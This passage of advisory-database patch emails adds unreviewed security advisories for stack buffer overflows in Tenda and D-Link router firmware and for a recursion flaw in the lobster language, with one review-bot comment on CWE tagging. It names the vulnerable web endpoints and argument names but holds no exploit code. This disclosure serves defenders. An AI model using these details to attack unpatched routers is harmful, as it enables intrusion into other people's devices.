From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sat, 21 Feb 2026 18:32:29 +0000 Subject: [PATCH 38/77] Publish Advisories GHSA-2j3g-5jhm-r285 GHSA-6238-4w9x-vrrr GHSA-73gf-5w78-3r4q GHSA-mq2p-gcxf-x8gf GHSA-pg46-g938-p94j --- .../GHSA-2j3g-5jhm-r285.json | 56 +++++++++++++++++ .../GHSA-6238-4w9x-vrrr.json | 56 +++++++++++++++++ .../GHSA-73gf-5w78-3r4q.json | 60 +++++++++++++++++++ .../GHSA-mq2p-gcxf-x8gf.json | 56 +++++++++++++++++ .../GHSA-pg46-g938-p94j.json | 56 +++++++++++++++++ 5 files changed, 284 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-2j3g-5jhm-r285/GHSA-2j3g-5jhm-r285.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6238-4w9x-vrrr/GHSA-6238-4w9x-vrrr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-73gf-5w78-3r4q/GHSA-73gf-5w78-3r4q.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mq2p-gcxf-x8gf/GHSA-mq2p-gcxf-x8gf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pg46-g938-p94j/GHSA-pg46-g938-p94j.json diff --git a/advisories/unreviewed/2026/02/GHSA-2j3g-5jhm-r285/GHSA-2j3g-5jhm-r285.json b/advisories/unreviewed/2026/02/GHSA-2j3g-5jhm-r285/GHSA-2j3g-5jhm-r285.json new file mode 100644 index 0000000000000..d479a73078c10 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2j3g-5jhm-r285/GHSA-2j3g-5jhm-r285.json 
@@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2j3g-5jhm-r285", + "modified": "2026-02-21T18:31:16Z", + "published": "2026-02-21T18:31:16Z", + "aliases": [ + "CVE-2026-2872" + ], + "details": "A security vulnerability has been detected in Tenda A21 1.0.0.0. This vulnerability affects the function set_device_name of the file /goform/setBlackRule of the component MAC Filtering Configuration Endpoint. Such manipulation of the argument devName/mac leads to stack-based buffer overflow. The attack may be performed from remote. The exploit has been disclosed publicly and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2872" + }, + { + "type": "WEB", + "url": "https://github.com/QIU-DIE/cve-nneeww/issues/3" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347109" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347109" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754634" + }, + { + "type": "WEB", + "url": "https://www.tenda.com.cn" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T16:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6238-4w9x-vrrr/GHSA-6238-4w9x-vrrr.json b/advisories/unreviewed/2026/02/GHSA-6238-4w9x-vrrr/GHSA-6238-4w9x-vrrr.json new file mode 100644 index 0000000000000..cffa1ae108560 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6238-4w9x-vrrr/GHSA-6238-4w9x-vrrr.json 
@@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6238-4w9x-vrrr", + "modified": "2026-02-21T18:31:16Z", + "published": "2026-02-21T18:31:16Z", + "aliases": [ + "CVE-2026-2873" + ], + "details": "A vulnerability was detected in Tenda A21 1.0.0.0. This issue affects the function setSchedWifi of the file /goform/openSchedWifi. Performing a manipulation of the argument schedStartTime/schedEndTime results in stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit is now public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2873" + }, + { + "type": "WEB", + "url": "https://github.com/QIU-DIE/cve-nneeww/issues/4" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347110" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347110" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754635" + }, + { + "type": "WEB", + "url": "https://www.tenda.com.cn" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T17:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-73gf-5w78-3r4q/GHSA-73gf-5w78-3r4q.json b/advisories/unreviewed/2026/02/GHSA-73gf-5w78-3r4q/GHSA-73gf-5w78-3r4q.json new file mode 100644 index 0000000000000..65b739ed468eb --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-73gf-5w78-3r4q/GHSA-73gf-5w78-3r4q.json 
@@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-73gf-5w78-3r4q", + "modified": "2026-02-21T18:31:16Z", + "published": "2026-02-21T18:31:16Z", + "aliases": [ + "CVE-2026-2871" + ], + "details": "A weakness has been identified in Tenda A21 1.0.0.0. This affects the function fromSetIpMacBind of the file /goform/SetIpMacBind. This manipulation of the argument list causes stack-based buffer overflow. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be used for attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2871" + }, + { + "type": "WEB", + "url": "https://github.com/QIU-DIE/cve-nneeww/issues/2" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347108" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347108" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754630" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754631" + }, + { + "type": "WEB", + "url": "https://www.tenda.com.cn" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T16:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-mq2p-gcxf-x8gf/GHSA-mq2p-gcxf-x8gf.json b/advisories/unreviewed/2026/02/GHSA-mq2p-gcxf-x8gf/GHSA-mq2p-gcxf-x8gf.json new file mode 100644 index 0000000000000..5deac4e56cbf7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mq2p-gcxf-x8gf/GHSA-mq2p-gcxf-x8gf.json 
@@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mq2p-gcxf-x8gf", + "modified": "2026-02-21T18:31:16Z", + "published": "2026-02-21T18:31:16Z", + "aliases": [ + "CVE-2026-2874" + ], + "details": "A flaw has been found in Tenda A21 1.0.0.0. Impacted is the function form_fast_setting_wifi_set of the file /goform/fast_setting_wifi_set. Executing a manipulation of the argument ssid can lead to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been published and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2874" + }, + { + "type": "WEB", + "url": "https://github.com/QIU-DIE/cve-nneeww/issues/5" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347111" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347111" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754636" + }, + { + "type": "WEB", + "url": "https://www.tenda.com.cn" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T18:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pg46-g938-p94j/GHSA-pg46-g938-p94j.json b/advisories/unreviewed/2026/02/GHSA-pg46-g938-p94j/GHSA-pg46-g938-p94j.json new file mode 100644 index 0000000000000..ef2f9d32c8a66 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pg46-g938-p94j/GHSA-pg46-g938-p94j.json 
@@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pg46-g938-p94j", + "modified": "2026-02-21T18:31:16Z", + "published": "2026-02-21T18:31:16Z", + "aliases": [ + "CVE-2026-2876" + ], + "details": "A vulnerability was determined in Tenda A18 15.13.07.13. This affects the function parse_macfilter_rule of the file /goform/setBlackRule. This manipulation of the argument deviceList causes stack-based buffer overflow. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2876" + }, + { + "type": "WEB", + "url": "https://github.com/master-abc/cve/issues/38" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347114" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347114" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754675" + }, + { + "type": "WEB", + "url": "https://www.tenda.com.cn" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T18:16:00Z" + } +} \ No newline at end of file From 6fbb688fbbcc7274abcf92e1308cf4e36547412d Mon Sep 17 00:00:00 2001 
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sat, 21 Feb 2026 21:31:46 +0000 Subject: [PATCH 39/77] Publish Advisories GHSA-69vg-2v33-6p2v GHSA-7597-723j-pwr9 GHSA-9j32-rfj4-grgw GHSA-mr72-9cxv-g662 GHSA-q2r4-399v-qv3c GHSA-v43p-pv9w-gqmf GHSA-vgp4-r46f-r9x7 GHSA-w4gp-396m-45pm --- .../GHSA-69vg-2v33-6p2v.json | 56 +++++++++++++++ .../GHSA-7597-723j-pwr9.json | 56 +++++++++++++++ .../GHSA-9j32-rfj4-grgw.json | 56 +++++++++++++++ .../GHSA-mr72-9cxv-g662.json | 56 +++++++++++++++ .../GHSA-q2r4-399v-qv3c.json | 56 +++++++++++++++ .../GHSA-v43p-pv9w-gqmf.json | 72 +++++++++++++++++++ .../GHSA-vgp4-r46f-r9x7.json | 56 +++++++++++++++ .../GHSA-w4gp-396m-45pm.json | 56 +++++++++++++++ 8 files changed, 464 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-69vg-2v33-6p2v/GHSA-69vg-2v33-6p2v.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7597-723j-pwr9/GHSA-7597-723j-pwr9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9j32-rfj4-grgw/GHSA-9j32-rfj4-grgw.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mr72-9cxv-g662/GHSA-mr72-9cxv-g662.json create mode 100644 advisories/unreviewed/2026/02/GHSA-q2r4-399v-qv3c/GHSA-q2r4-399v-qv3c.json create mode 100644 advisories/unreviewed/2026/02/GHSA-v43p-pv9w-gqmf/GHSA-v43p-pv9w-gqmf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vgp4-r46f-r9x7/GHSA-vgp4-r46f-r9x7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w4gp-396m-45pm/GHSA-w4gp-396m-45pm.json diff --git a/advisories/unreviewed/2026/02/GHSA-69vg-2v33-6p2v/GHSA-69vg-2v33-6p2v.json b/advisories/unreviewed/2026/02/GHSA-69vg-2v33-6p2v/GHSA-69vg-2v33-6p2v.json new file mode 100644 index 0000000000000..2658979a752e0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-69vg-2v33-6p2v/GHSA-69vg-2v33-6p2v.json 
@@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-69vg-2v33-6p2v", + "modified": "2026-02-21T21:30:27Z", + "published": "2026-02-21T21:30:27Z", + "aliases": [ + "CVE-2026-2877" + ], + "details": "A vulnerability has been found in Tenda A18 15.13.07.13. This affects the function strcpy of the file /goform/WifiExtraSet of the component Httpd Service. The manipulation of the argument wpapsk_crypto5g leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2877" + }, + { + "type": "WEB", + "url": "https://github.com/master-abc/cve/issues/39" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347130" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347130" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754703" + }, + { + "type": "WEB", + "url": "https://www.tenda.com.cn" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T19:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-7597-723j-pwr9/GHSA-7597-723j-pwr9.json b/advisories/unreviewed/2026/02/GHSA-7597-723j-pwr9/GHSA-7597-723j-pwr9.json new file mode 100644 index 0000000000000..ade1e0ce092ae --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7597-723j-pwr9/GHSA-7597-723j-pwr9.json 
@@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7597-723j-pwr9", + "modified": "2026-02-21T21:30:27Z", + "published": "2026-02-21T21:30:27Z", + "aliases": [ + "CVE-2026-2885" + ], + "details": "A security flaw has been discovered in D-Link DWR-M960 1.01.07. The impacted element is the function sub_469104 of the file /boafrm/formIpv6Setup. The manipulation of the argument submit-url results in stack-based buffer overflow. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2885" + }, + { + "type": "WEB", + "url": "https://github.com/LX-66-LX/cve-new/issues/19" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347179" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347179" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754496" + }, + { + "type": "WEB", + "url": "https://www.dlink.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T21:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9j32-rfj4-grgw/GHSA-9j32-rfj4-grgw.json b/advisories/unreviewed/2026/02/GHSA-9j32-rfj4-grgw/GHSA-9j32-rfj4-grgw.json new file mode 100644 index 0000000000000..e128966847add --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9j32-rfj4-grgw/GHSA-9j32-rfj4-grgw.json 
@@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9j32-rfj4-grgw", + "modified": "2026-02-21T21:30:27Z", + "published": "2026-02-21T21:30:27Z", + "aliases": [ + "CVE-2026-2882" + ], + "details": "A vulnerability was found in D-Link DWR-M960 1.01.07. This issue affects the function sub_46385C of the file /boafrm/formDosCfg. Performing a manipulation of the argument submit-url results in stack-based buffer overflow. Remote exploitation of the attack is possible. The exploit has been made public and could be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2882" + }, + { + "type": "WEB", + "url": "https://github.com/LX-66-LX/cve-new/issues/16" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347176" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347176" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754487" + }, + { + "type": "WEB", + "url": "https://www.dlink.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T20:16:40Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-mr72-9cxv-g662/GHSA-mr72-9cxv-g662.json b/advisories/unreviewed/2026/02/GHSA-mr72-9cxv-g662/GHSA-mr72-9cxv-g662.json new file mode 100644 index 0000000000000..237285b90774a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mr72-9cxv-g662/GHSA-mr72-9cxv-g662.json 
@@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mr72-9cxv-g662", + "modified": "2026-02-21T21:30:27Z", + "published": "2026-02-21T21:30:27Z", + "aliases": [ + "CVE-2026-2886" + ], + "details": "A weakness has been identified in Tenda A21 1.0.0.0. This affects the function set_device_name of the file /goform/SetOnlineDevName. This manipulation of the argument devName causes stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2886" + }, + { + "type": "WEB", + "url": "https://github.com/QIU-DIE/cve-nneeww/issues/6" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347180" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347180" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754640" + }, + { + "type": "WEB", + "url": "https://www.tenda.com.cn" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T21:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q2r4-399v-qv3c/GHSA-q2r4-399v-qv3c.json b/advisories/unreviewed/2026/02/GHSA-q2r4-399v-qv3c/GHSA-q2r4-399v-qv3c.json new file mode 100644 index 0000000000000..5627cb3ee33a1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q2r4-399v-qv3c/GHSA-q2r4-399v-qv3c.json 
@@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q2r4-399v-qv3c", + "modified": "2026-02-21T21:30:27Z", + "published": "2026-02-21T21:30:27Z", + "aliases": [ + "CVE-2026-2881" + ], + "details": "A vulnerability has been found in D-Link DWR-M960 1.01.07. This vulnerability affects the function sub_425FF8 of the file /boafrm/formFirewallAdv of the component Advanced Firewall Configuration Endpoint. Such manipulation of the argument submit-url leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2881" + }, + { + "type": "WEB", + "url": "https://github.com/LX-66-LX/cve-new/issues/15" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347175" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347175" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754486" + }, + { + "type": "WEB", + "url": "https://www.dlink.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T20:16:39Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v43p-pv9w-gqmf/GHSA-v43p-pv9w-gqmf.json b/advisories/unreviewed/2026/02/GHSA-v43p-pv9w-gqmf/GHSA-v43p-pv9w-gqmf.json new file mode 100644 index 0000000000000..4638269f7db79 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v43p-pv9w-gqmf/GHSA-v43p-pv9w-gqmf.json 
@@ -0,0 +1,72 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v43p-pv9w-gqmf", + "modified": "2026-02-21T21:30:27Z", + "published": "2026-02-21T21:30:27Z", + "aliases": [ + "CVE-2026-2887" + ], + "details": "A security vulnerability has been detected in aardappel lobster up to 2025.4. This impacts the function lobster::TypeName in the library dev/src/lobster/idents.h. Such manipulation leads to uncontrolled recursion. The attack can only be performed from a local environment. The exploit has been disclosed publicly and may be used. Upgrading to version 2026.1 will fix this issue. The name of the patch is 8ba49f98ccfc9734ef352146806433a41d9f9aa6. It is advisable to upgrade the affected component.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2887" + }, + { + "type": "WEB", + "url": "https://github.com/aardappel/lobster/issues/397" + }, + { + "type": "WEB", + "url": "https://github.com/aardappel/lobster/issues/397#issuecomment-3849015088" + }, + { + "type": "WEB", + "url": "https://github.com/aardappel/lobster/commit/8ba49f98ccfc9734ef352146806433a41d9f9aa6" + }, + { + "type": "WEB", + "url": "https://github.com/aardappel/lobster" + }, + { + "type": "WEB", + "url": "https://github.com/aardappel/lobster/releases/tag/v2026.1" + }, + { + "type": "WEB", + "url": "https://github.com/oneafter/0204/blob/main/lob3/repro.lobster" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347181" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347181" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755026" + } + ], + "database_specific": { + "cwe_ids": [ + 
"CWE-404" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T21:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vgp4-r46f-r9x7/GHSA-vgp4-r46f-r9x7.json b/advisories/unreviewed/2026/02/GHSA-vgp4-r46f-r9x7/GHSA-vgp4-r46f-r9x7.json new file mode 100644 index 0000000000000..cedafbf2f830e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vgp4-r46f-r9x7/GHSA-vgp4-r46f-r9x7.json 
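Review bot: `cwe_ids` in GHSA-v43p-pv9w-gqmf lists `"CWE-404"` (improper resource shutdown or release), which does not match the uncontrolled recursion in `lobster::TypeName` that `details` describes; `"CWE-674"` is the class for that weakness. `details` gives the fix (version 2026.1, commit 8ba49f98ccfc9734ef352146806433a41d9f9aa6), but `affected` is empty, so the "up to 2025.4" bound is prose only and range-based matching will not pick it up.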
@@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vgp4-r46f-r9x7", + "modified": "2026-02-21T21:30:27Z", + "published": "2026-02-21T21:30:27Z", + "aliases": [ + "CVE-2026-2883" + ], + "details": "A vulnerability was determined in D-Link DWR-M960 1.01.07. Impacted is the function sub_427D74 of the file /boafrm/formIpQoS. Executing a manipulation of the argument submit-url can lead to stack-based buffer overflow. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2883" + }, + { + "type": "WEB", + "url": "https://github.com/LX-66-LX/cve-new/issues/17" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347177" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347177" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754490" + }, + { + "type": "WEB", + "url": "https://www.dlink.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + 